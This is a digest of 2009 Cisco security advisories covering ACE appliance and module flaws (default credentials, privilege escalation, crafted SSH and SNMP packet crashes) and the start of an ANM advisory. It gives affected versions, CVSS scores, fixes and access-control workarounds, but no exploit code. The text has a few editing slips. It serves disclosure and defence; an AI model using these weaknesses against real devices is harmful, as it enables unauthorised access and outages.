should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
This vulnerability was reported to Cisco by National Australia Bank's
Security Assurance team.
Cisco would like to thank the National Australia Bank's Security
Assurance team for the discovery and reporting of the vulnerability.
The Cisco PSIRT is not aware of any malicious use of the
vulnerability described in this advisory.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090225-mtgplace.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-February-25 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iD8DBQFJpWeb86n/Gc8U/uARAty+AKCIt9MQ0A+BzIMX+MBZHjiod59WBACeMUgH
rPsjG9qKmCDQlA6XlaLFMr0=
=6x6Q
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE
Application Control Engine Module and Cisco ACE 4710 Application
Control Engine
Document ID: 109450
Advisory ID: cisco-sa-20090225-ace
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml
Revision 1.0
For Public Release 2009 February 25 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
The Cisco ACE Application Control Engine Module and Cisco ACE 4710
Application Control Engine Cisco ACE Module and Cisco ACE 4710
Application Control Engine contain multiple vulnerabilities that, if
exploited, can could result in any of the following impacts:
* Administrative level access via default user names and passwords
* Privilege escalation
* A denial of service (DoS) condition
Cisco has released free software updates available for affected
customers. Workarounds that mitigate some of the vulnerabilities are
available.
Note: These vulnerabilities are independent of each other. A device
may be affected by one vulnerability and not affected by another.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml
Note: This advisory is being released simultaneously with a multiple
vulnerability disclosure advisory that impacts the Cisco 4700 Series
Application Control Engine Device Manager and Application Networking
Manager module software.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml
Affected Products
=================
Vulnerable Products
+------------------
The following table displays the products that are affected by each
vulnerability that is described within this advisory.
+-------------------------------------------------------------------+
| | Products and Versions |
| | Affected |
|Vulnerability |-----------------------------|
| | Cisco ACE | Cisco ACE |
| | 4710 | Module |
| | Appliance | |
|-------------------------------------+--------------+--------------|
| | All versions | All versions |
| Default Usernames and Passwords | prior to A1 | prior to A2 |
| | (8a) | (1.1) |
|-------------------------------------+--------------+--------------|
| | All versions | All versions |
| Privilege Escalation Vulnerability | prior to A1 | prior to A2 |
| | (8a) | (1.2) |
|-------------------------------------+--------------+--------------|
| | All versions | All versions |
| Crafted SSH Packet Vulnerability | prior to A3 | prior to A2 |
| | (2.1) | (1.3) |
|-------------------------------------+--------------+--------------|
| Crafted Simple Network Management | All versions | All versions |
| Protocol version 2 (SNMPv2) Packet | prior to A3 | prior to A2 |
| Vulnerability | (2.1) | (1.3) |
|-------------------------------------+--------------+--------------|
| | All versions | All versions |
| Crafted SNMPv3 Packet Vulnerability | prior to A1 | prior to A2 |
| | (8.0) | (1.2) |
+-------------------------------------------------------------------+
Determining Software Versions
+----------------------------
To display the version of system software that is currently running
on Cisco ACE Application Control Engine, use the show version
command. The following example displays the output of the show
version command on the Cisco ACE Application Control Engine software
version A3(1.0):
ACE-4710/Admin# show version
Cisco Application Control Software (ACSW)
TAC support: http://www.cisco.com/tac
Copyright (c) 1985-2008 by Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html
Software
loader: Version 0.95
system: Version A3(1.0) [build 3.0(0)A3(0.0.148) adbuild_03:31:25-2008/08/06_/auto/adbure_nightly2/nightly_rel_a3_1_0_throttle/REL_3_0_0_A3_0_0
system image file: (nd)/192.168.65.31/scimitar.bin
Device Manager version 1.1 (0) 20080805:0415
...
<output truncated>
The following example displays the output of the show version command
on a Cisco ACE Application Control Engine module software version A1(1):
ACE-mod/Admin# show version
Cisco Application Control Software (ACSW)
TAC support: http://www.cisco.com/tac
Copyright (c) 2002-2006, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html
Software
loader: Version 12.2[117]
system: Version 3.0(0)A1(1) [build 3.0(0)A1(1) _01:26:21-2006/03/13_/auto/adbu-rel/ws/REL_3_0_0_A1_1]
system image file: [LCP] disk0:c6ace-t1k9-mzg.3.0.0_A1_1.bin
licensed features: no feature license is installed
...
<output truncated>
Products Confirmed Not Vulnerable
+--------------------------------
The Cisco ACE XML Gateway, the Cisco ACE Web Application Firewall,
and the Cisco ACE GSS 4400 Series Global Site Selector Appliances are
not affected by any of the vulnerabilities that are described in this
advisory. No other Cisco products are currently known to be affected
by these vulnerabilities.
Details
=======
The Cisco ACE 4710 Application Control Engine appliance and the Cisco
ACE Application Control Engine Module for Cisco Catalyst 6500 Series
Switches and Cisco 7600 Series Routers are a load-balancing and
application-delivery solution for data centers. Multiple
vulnerabilities exist in both products. The following information
provides the details about each of the vulnerabilities that are
addressed in this advisory.
Default Usernames and Passwords
+------------------------------
Versions of the Cisco ACE 4710 Application Control Engine appliance
prior to software version A1(8a) use default administrator, web
management, and device management account credentials. Similarly,
software versions of the Cisco ACE Application Control Engine Module
prior to software version A2(1.1) use default administrator and web
management credentials. The appliance and module do not prompt users
to modify system account passwords during the initial configuration
process. An attacker with knowledge of these accounts could modify
the application configuration and, in certain instances, gain user
access to the host operating system.
This vulnerability is documented in the following Cisco Bug IDs and
have been assigned the following Common Vulnerability and Exposures
(CVE) IDs:
* Cisco ACE Application Control Engine Module: CSCsq43828 (
registered customers only) - CVE-2009-0620
* Cisco ACE Application Control Engine Appliance: CSCsq43229 (
registered customers only) - CVE-2009-0621
A third account is used for the Cisco 4700 Series Application Control
Engine Appliance Device Manager also uses default credentials. Only
the Cisco ACE 4710 Application Control Engine appliance is affected
by this vulnerability. This vulnerability is documented in Cisco Bug
ID CSCsq32379 ( registered customers only) and has also been assigned
the Common Vulnerability and Exposures (CVE) ID CVE-2009-0621.
Privilege Escalation Vulnerability
+---------------------------------
A vulnerability exists in versions of the Cisco ACE 4710 Application
Control Engine appliance prior to A1(8a) and the Cisco ACE
Application Control Engine Module prior to version A2(1.3). An
authenticated user could exploit this vulnerability to invoke
administrative commands via the device command line interface (CLI).
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine ModuleACE Module: CSCsq48546
( registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCsq09839 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0622.
Crafted SSH Packet Vulnerability
+-------------------------------
A vulnerability exists in the Cisco ACE 4710 Application Control
Engine appliance prior to software version A3(2.1) and the Cisco ACE
Application Control Engine Module prior to software version A2(1.3).
An attacker could exploit this vulnerability to cause the device to
reload by sending a crafted SSH packet to it.
Note: SSH access must be configured on the affected device for it to
be vulnerable. SSH access is not enabled by default. A full TCP
three-way handshake is not necessary to trigger the effects of this
vulnerability.
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine Module: CSCsv01877 (
registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCsv01738 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0623.
Crafted SNMPv2c Packet Vulnerability
+-----------------------------------
A vulnerability exists in the Cisco ACE 4710 Application Control
Engine appliance prior to software version A3(2.1) and the Cisco ACE
Application Control Engine Module prior to software version A2(1.3).
An authenticated attacker could send a crafted SNMPv1 packet to an
affected device to cause it to reload.
Note: SNMPv2c must be explicitly configured in an affected device in
order to process any SNMPv2c transactions. SNMPv2c is not enabled by
default.
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine Module: CSCsu36038 (
registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCsu47876 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0624.
Crafted SNMPv3 Packet Vulnerability
+----------------------------------
A vulnerability exists in the Cisco ACE 4710 Application Control
Engine appliance prior to software version A1(8.0) and the Cisco ACE
Application Control Engine Module prior to software version A2(1.2).
An where an attacker may could cause the a device to reload by
sending a crafted SNMPv3 packet to it.
Note: SNMPv3 must be explicitly configured in an affected device in
order to process any SNMPv3 transactions. SNMPv3 is not enabled by
default.
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine Module: CSCsq45432 (
registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCso83126 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0625.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsq43828 and CSCsq43229 - Default users and passwords on ACE module
and appliance
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsq32379 - DM Default Account Credentials
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsq48546 and CSCsq09839 - Privilege escalation issue on ACE Module
and ACE Appliance
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsv01877 and CSCsv01738 - Crafted SSH packet may cause ACE module
or appliance to reload
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsu36038 and CSCsu47876 - Crafted SNMPv2c packet may crash ACE
module and appliance
CVSS Base Score - 6.8
Access Vector - Network
Access Complexity - Single
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.6
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCso83126 and CSCsq45432 - Crafted SNMPv3 packet may crash ACE
appliance
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
An attacker with knowledge of the Default Usernames and Passwords
Vulnerability accounts could modify the device configuration and, in
certain instances, gain user access to the host operating system.
An exploit of the Privilege Escalation Vulnerability could allow an
authenticated attacker to execute host operating system
administrative commands.
Successful exploitation of the Crafted SSH Packet Vulnerability,
Crafted SNMPv2 Packet Vulnerability, and Crafted SNMPv3 Packet
Vulnerability may cause a reload of the affected device. Repeated
exploitation could result in a sustained DoS condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table (below) describes the earliest
possible releases that contain the fix (along with the anticipated
date of availability for each, if applicable) are listed in the
"First Fixed Release" column of the table. The "Recommended Release"
column indicates the releases which have fixes for all the published
vulnerabilities at the time of this Advisory. A device running a
release in the given train that is earlier than the release in a
specific column (less than the First Fixed Release) is known to be
vulnerable. Cisco recommends upgrading to a release equal to or later
than the release in the "Recommended Releases" column of the table.
+----------------------------------------------------------------------------------------------------------+
| | Products and Versions Affected |
| |---------------------------------------------------------------------|
| | Cisco ACE 4710 Appliance | Cisco ACE Module |
|Vulnerability |----------------------------------+----------------------------------|
| | First Fixed | Recommended | First | |
| | Release | Release | Fixed | Recommended Release |
| | | | Release | |
|------------------------------------+---------------+------------------+------------+---------------------|
| Default Usernames and Passwords | A1(8a) | A3(2.1) | A2(1.1) | A2(1.3) |
|------------------------------------+---------------+------------------+------------+---------------------|
| Privilege Escalation Vulnerability | A1(8a) | A3(2.1) | A2(1.2) | A2(1.3) |
|------------------------------------+---------------+------------------+------------+---------------------|
| Crafted SSH Packet Vulnerability | A3(2.1) | A3(2.1) | A2(1.3) | A2(1.3) |
|------------------------------------+---------------+------------------+------------+---------------------|
| Crafted SNMPv2 Packet | A3(2.1) | A3(2.1) | A2(1.3) | A2(1.3) |
| Vulnerability | | | | |
|------------------------------------+---------------+------------------+------------+---------------------|
| Crafted SNMPv2 Packet | A1(8.0) | A3(2.1) | A2(1.2) | A2(1.3) |
| Vulnerability | | | | |
+----------------------------------------------------------------------------------------------------------+
Cisco ACE module software can be downloaded from:
http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=280557289
Cisco ACE 4710 Application Control Engine appliance software can be
downloaded from:
http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=281222179
Workarounds
===========
This Security Advisory describes multiple distinct vulnerabilities.
These vulnerabilities and their respective workarounds are
independent of each other.
Default Usernames and Passwords
+------------------------------
To change the default administrative password, use the username
command in configuration mode. The syntax of this command is as
follows:
username admin [password [0 | 5] {password}]
The keywords, arguments, and options are:
admin--Specifies the default administrative user name.
password--(Optional) Keyword that indicates that a password follows.
0--(Optional) Specifies a clear text password.
5--(Optional) Specifies an MD5-hashed strong encryption password.
password--The password in clear text, encrypted text, or MD5 strong
encryption, depending on the numbered option (0 or 5) that you enter.
If you do not enter a numbered option, the password is in clear text
by default. Enter a password as an unquoted text string with a
maximum of 64 characters.
For example, to create a user named admin that uses the clear text
password my_super_secret_88312, enter the following command:
ACE(config)# username admin password 0 my_super_secret_88312
Note: This process can also be followed to change the www user
account credentials. The dm user is for accessing the Device Manager
GUI and cannot be modified or deleted. The dm user is an internal
user required by the Device Manager GUI; it is hidden on the ACE CLI.
For more information refer to:
http://www.cisco.com/en/US/docs/app_ntwk_services/data_center_app_services/ace_appliances/vA3_1_0/configuration/virtualization/guide/config.html
Privilege Escalation Vulnerability
+---------------------------------
There are no workarounds for this vulnerability.
Crafted SSH Packet Vulnerability
+-------------------------------
SSH management traffic that can be received by the ACE is controlled
through the use of class maps, policy maps, and service policies.
This Management Traffic Service example denies unauthorized SSH
packets that are sent to an affected device. In the following
example, 192.168.100.1 is considered a trusted source that requires
SSH access to the affected device. Care should be taken to allow all
required management access to the affected device. An attacker could
exploit this vulnerability using spoofed packets. This workaround
cannot provide complete protection against this vulnerability when
the attack comes from a trusted source address.
The following example demonstrates how SSH access to the ACE is only
allowed from the 192.168.100.1 host:
!-- Configure a class to allow SSH from the trusted source
!
class-map type management match-all Permit_SSH_Class
description Allow SSH from trusted sources Class
match protocol ssh source-address 192.168.100.1 255.255.255.255
!
!-- Configure a management policy that allows ssh from the
!--trusted source configured in the above class
!
policy-map type management first-match Permit_SSH_Policy
description Allow SSH from trusted sources Policy
class Permit_SSH_Class
permit
!
!-- Apply the management policy globally
!
service-policy input Permit_SSH_Policy
Additional information about "Configuring SSH Management Sessions" is
available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/access.html#wp1049450
Additional information about "Configuring Class Maps and Policy Maps"
is available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/mapolcy.html
warning Warning: It is possible to easily spoof the sender's IP
address, which may defeat class maps and access control lists (ACLs)
that permit communication to the device from trusted IP addresses.
Crafted SNMPv2 and SNMPv3 Packet Vulnerabilities
+-----------------------------------------------
SNMP management traffic that can be received by the ACE is controlled
through the use of class maps, policy maps, and service policies.
This Management Traffic Service example denies unauthorized SNMP
packets on UDP port 161 that are sent to an affected device. In the
following example, 192.168.100.1 is considered a trusted source that
requires SNMP access to the affected device. Care should be taken to
allow all required management access to the affected device. An
attacker could exploit this vulnerability using spoofed packets. This
workaround cannot provide complete protection against this
vulnerability when the attack comes from a trusted source address.
!-- Configure a class to allow SNMP from the trusted source
!
class-map type management match-all Permit_SNMP_Class
description Allow SNMP from trusted sources Class
2 match protocol snmp source-address 192.168.100.1 255.255.255.255
!
!-- Configure a management policy that allows snmp from the
!--trusted source configured in the above class
!
policy-map type management first-match Permit_SNMP_Policy
description Allow SNMP from trusted sources Policy
class Permit_SNMP_Class
permit
!-- Apply the management policy globally
!
service-policy input Permit_SNMP_Policy
Additional information about "SNMP Management Traffic Services" is
available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/snmp.html#wp1034011
Additional information about "Configuring Class Maps and Policy Maps"
is available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/mapolcy.html
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090225-ace.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were found during internal testing.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-------------------------------------------------------------------+
| Revision 1.0 | 2009-February-25 | Initial public release |
+-------------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkmlbsoACgkQ86n/Gc8U/uA9egCgiM1YYI9hZhS8iZ5kbEw6vxaq
gM8AnjpFAJaZ/RK593w/5j/mRHxjkLVo
=rWBu
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco ACE Application Control Engine Device
Manager and Application Networking Manager Vulnerabilities
Advisory ID: cisco-sa-20090225-anm
http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml
Revision 1.0
For Public Release 2009 February 25 1600 UTC (GMT)
Summary
=======
Multiple vulnerabilities exist in the Cisco Application Networking
Manager (ANM) and Cisco Application Control Engine (ACE) Device
Manager applications. These vulnerabilities are independent of each
other. Successful exploitation of these vulnerabilities may result in
unauthorized system or host operating system access.
This security advisory identifies the following vulnerabilities:
* ACE Device Manager and ANM invalid directory permissions
vulnerability
* ANM default user credentials vulnerability
* ANM MySQL default credentials vulnerability
* ANM Java agent privilege escalation
Cisco has released free software updates that address these
vulnerabilities. A workaround that mitigates one of the issues is
available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml.
Note: This advisory is being released simultaneously with a multiple
vulnerabilities advisory impacting the ACE appliance and module
software, which is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml.
Affected Products
=================
Vulnerable Products
- -------------------
The following are the products and versions affected by each
vulnerability described within this advisory.
+---------------------------------------+
| Vulnerability | Product | Version |
| | Affected | Affected |
|---------------+----------+------------|
| Invalid | ACE | All |
| Directory | Device | versions |
| Permissions | Manager | prior to |
| | | A3(2.1) |
|---------------+----------+------------|
| Invalid | | All |
| Directory | ANM | versions |
| Permissions | | prior to |
| | | ANM 2.0 |
|---------------+----------+------------|
| | | All |
| Default User | ANM | versions |
| Credentials | | prior to |
| | | ANM 2.0 |
|---------------+----------+------------|
| | | All |
| MySQL Default | ANM | versions |
| Credentials | | prior to |
| | | ANM 2.0 |
|---------------+----------+------------|
| | | All |
| Java Agent | | versions |
| Privilege | ANM | prior to |
| Escalation | | ANM 2.0 |
| | | Update A |
+---------------------------------------+
Determining ACE Device Manager Software Version
+----------------------------------------------
The ACE Device Manager is embedded with the ACE appliance software.
To display the version of system software that is currently running
on the device, use the "show version" command. The following example
includes the output of the "show version" command on a Cisco ACE
appliance running software version A3(2.1):
ACE-4710/Admin# show version
Cisco Application Control Software (ACSW)
TAC support: http://www.cisco.com/tac
Copyright (c) 1985-2008 by Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html.
Software
loader: Version 0.95
system: Version A3(2.1) [build 3.0(0)A3(2.1) adbuild_14:33:29-2008/11/19_/auto/adbu-rel4/rel_a3_2_1_throttle_build/REL_3_0_0_A3_2_1]
system image file: (nd)/192.168.65.32/scimitar.bin
Device Manager version 1.1 (0) 20081113:2052
---
Determining ANM Software Version
+-------------------------------
To display the version of ANM software that is currently installed,
login to the ANM server and select the "About" keyword in the upper
right. An informational pop up window will be displayed. ANM Version 2.0
Update A is indicated in the example output below.
Version: 2.0(0), Update: A
Build Number: 709
Build Timestamp: 20081031:1226
Products Confirmed Not Vulnerable
- ---------------------------------
The Cisco ACE XML Gateway, Cisco ACE GSS (Global Site Selector) 4400
Series and Cisco ACE Web Application Firewall are not affected by any of
these vulnerabilities.
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
ANM is a network management application that manages Cisco ACE modules
or appliances. ANM is installed on customer provided servers with a Red
Hat Enterprise Linux operating system. The ACE Device Manager provides
a browser-based interface for configuring and managing a single ACE
appliance. The ACE Device Manager resides in flash memory on the ACE
appliance. Multiple vulnerabilities exist in ANM and one in the ACE
Device Manager products. The following details are provided for each
vulnerability addressed in this security advisory.
Invalid Directory Permissions
+----------------------------
Versions of the Cisco ACE Device Manager prior to software version
A3(2.1) and Cisco ANM prior software version ANM 2.0 contain directory
traversal vulnerabilities. These vulnerabilities could allow
unauthorized access to ACE operating system and host operating system
files. To exploit these vulnerabilities authentication is required to
initially access either product.
This vulnerability is documented in the following Cisco Bug IDs:
* CSCsv66063
* CSCsv70130
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0615.
Default User Credentials
+-----------------------
Versions of Cisco ANM prior to software version ANM 2.0 do not force
credential changes during installation. If these credentials are left
unchanged, this could allow unauthorized access to the ANM
application with default user credentials.
This vulnerability is documented in the following Cisco Bug ID:
* CSCsu52724
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0616.
MySQL Default Credentials
+------------------------
ANM versions prior to ANM 2.0 use a default MySQL root user password
during installation. The MySQL database is installed by default when
ANM is initially installed. This vulnerability can be exploited
remotely with default credential authentication and without end-user
interaction. Unauthorized access to the database may allow
modification of system files that could impact the function of ANM or
allow execution of commands on the underlying host operating system.
The ACE appliance and module device configuration files in the MySQL
database are encrypted.
This vulnerability is documented in the following Cisco Bug ID:
* CSCsu52632
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0617.
Java Agent Privilege Escalation
+------------------------------
ANM versions prior to ANM 2.0 Update A contain a remotely exploitable
vulnerability that could allow an attacker to view configuration
